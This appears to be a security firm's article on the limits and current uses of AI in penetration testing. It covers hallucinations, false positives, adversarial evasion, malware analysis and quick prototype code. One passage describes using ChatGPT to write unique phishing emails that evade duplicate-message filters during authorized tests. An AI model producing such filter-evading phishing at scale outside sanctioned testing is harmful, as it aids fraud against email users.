Excited about the potential of artificial intelligence (AI)? You’re not alone.
The last several months have seen the mass-market introduction of AI tools such as ChatGPT, Bard by Google, Bing AI and others. Many of these tools are large language models (LLM) that can answer in-depth questions and generate articles, computer programs and other work.
As AI technology develops and improves, the hope is that cybersecurity teams could use it to quickly test and identify flaws in systems faster than current penetration tests could.
While there are some use cases that make sense right now, most cybersecurity work still requires human expertise and oversight.
“Large language models are not a substitute for skill or experience,” said Victor Teissler, Director of Offensive Security at Digital Silence, a boutique cybersecurity agency.
“It’s a tool. And you still have to have a skilled and experienced person to vet or review the output to make sure that it’s valid.”
Why Companies Should Be Cautious About AI and Cybersecurity
There are a few reasons why AI tools aren’t perfect solutions for cybersecurity testing today.
Sometimes AI simply makes up information. As more people started using ChatGPT this year, they noticed something: When answering a question, sometimes the tool would return false or wrong answers and even generate fake evidence to support that answer.
You might have heard what happened to two attorneys who submitted a ChatGPT-generated motion in federal court. The document was filled with fake opinions and citations that ChatGPT had output and neither man had vetted.
This type of error is called a hallucination, and it’s something that can happen with large language models. The tool will generate answers that sound reasonable.
“But if you start pulling on the threads,” Teissler said, “then you’ll realize that some of the documents that it’s citing or some of the things that it’s alleging to be true are factually baseless.”
AI may generate too many false positives. For example, an AI-powered tool might notice that one user is generating a large number of LDAP queries. The user could have a legitimate reason for running those queries, but the AI doesn’t account for that.
If the AI keeps flagging innocent occurrences, it could lead the organization to ignore those warnings and take security reviews less seriously, which could give actual threat actors the opportunity they need to create real havoc.
It’s possible to trick AI. An AI-powered image classifier can distinguish a photo of a dog from a photo of a cat, Teissler said. But researchers have found that by changing a few pixels, basically invisible to the human eye, the program can be tricked into calling a cat a dog.
What if a similar technique were applied to traffic on a computer system?
“We could see a similar type of attack where just by changing a few bits, something that was considered malicious is now being seen as not malicious,” Teissler said.
How Cybersecurity Experts Use AI Today
While AI isn’t a perfect tool for cybersecurity, there are some use cases where it does make sense right now.
Creating better phishing emails at scale. As part of a cybersecurity review, testers will often send phishing emails that attempt to trick users into clicking a “malicious” link.
Digital Silence has used ChatGPT to create unique, customized emails for a large group of recipients. The writing looks authentic, but it’s harder for security programs to flag those messages.
Those programs often use a filter that will look for identical messages being sent to multiple recipients at the same company. With ChatGPT, each email is different, so they would be more likely to successfully pass through the filter, Teissler said.
Analyzing malware. Some cybersecurity experts will ask their AI tool to project how a piece of malware would behave if it were run.
It’s a great way to see what could happen without actually executing the malware and putting your systems at risk.
Generating prototype code quickly. Digital Silence has used ChatGPT to create basic programs as part of its security testing — for example, a Python program that can interact with an API.
“Something that would have taken a couple of hours instead took something on the order of minutes,” Teissler said.
In each of these cases, the AI can still make errors. A human being needs to edit and approve the work. But even when you add in that additional review time, the gains in efficiency are often significant.
AI Can — and Probably Will — Improve
Even if AI isn’t a perfect solution right now, there are several companies working to build new AI-powered tools.
For example, Sugar Security and other red-team tech vendors are starting to leverage AI for offensive security, said Logan Evans, a Senior Tester at Digital Silence.
Some blue-team vendors say they’re using AI now, but it’s not clear how (or how much) AI is being employed.
“I think we’re going to see some interesting AI usage in offensive security as well as defensive security very soon,” Teissler said. “I feel like it’s imminent.”
Teissler would be more likely to trust AI tools if the models would assign a confidence score to each bit of information included in their output. That is, how confident is the model that its work is accurate? Doing so would give users more insight into exactly where they need to review or revise the AI’s work.
Until that happens, companies should continue running tests with AI, but verify any output before relying on it.
“Use it,” Teissler said, “but don’t trust it blindly.”